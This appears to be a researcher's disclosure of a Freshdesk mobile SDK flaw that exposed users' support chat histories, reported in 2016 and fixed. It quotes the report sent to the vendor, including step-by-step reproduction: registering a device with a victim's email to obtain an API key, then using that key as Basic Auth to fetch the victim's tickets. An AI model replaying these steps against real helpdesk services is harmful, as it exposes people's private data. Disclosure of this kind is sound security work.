Freshdesk is a SaaS helpdesk and support software that is used by more than 100,000 companies worldwide. During a security review for one of our customers, we came across a security vulnerability in Freshdesk that exposed user chat and data for all users of customers of Freshdesk who were using the Freshdesk mobihelp Mobile SDK. Freshdesk has promised to inform all its customers who are affected and would be deprecating the current SDK. We reported the issue on 12 Dec 2016. A temporary fix was deployed on the same day and it was completely fixed on 26 Dec 2016.
It should be noted that your users data leak can happen from any of the third party softwares including customer support, analytics and . If possible, try to minimise sending a lot of personally identifiable information to other system other than what is absolutely required. It should be noted that a vulnerability was disclosed by Zendesk, a Freshdesk competitor in the past.
Here is the mail that was sent to Freshdesk describing the technical details of the issue.
Hi XXXXX,
We have researched a security vulnerability in Freshdesk that exposes user data and chat history for any user, given their email address on all [sic] of Freshdesk customers. The Freshdesk mobile SDK has a design flaw that exposes read functionality on /mobihelp endpoint. We advise you to verify this issue, notify all your customers and do an internal assessment of all your customer data and audit logs to check if any of their data was compromised in the past. Please do let us know when you fix this issue. We would be informing XXXXXX-COMPANY and XXXXXX-COMPANY about this issue later today.
STEPS TO REPRODUCE:
1. Make a request to the given URL with a unique device uuid and the victim’s email address. You will get an API key.
URL: https://bookmyshow.freshdesk.com/mobihelp/devices/register_user?format=json&pt=ios&sv=v1.6.5
REQUEST BODY:
{
“device_info”: {
“device_uuid”: “51BCA4F4–4826–499D-93D2-F3A53C4630A2”,
},
“user”: {
“external_id”: “913934”,
“email”:”victim@email.com”
“name”: “Victim”
}
}
RESPONSE BODY:
“api_key”: “Bo5PcxU45HiJCT26Rfdq”
2. Encode the API key with base64 for further use
Base64encode(Bo5PcxU45HiJCT26Rfdq:x)
3. Use the Base64 encoded string in step 2 in the Basic Auth header and make a GET request to the following URL
URL:https://bookmyshow.freshdesk.com/support/mobihelp/tickets?format=json&pt=ios&sv=v1.6.5
Authorization: Basic Qm81UGN4VTQ1SGlKQ1QyNlJmZHE6eA==
4. The response will contain the ticket/chat history and possibly personal information somehere in it.
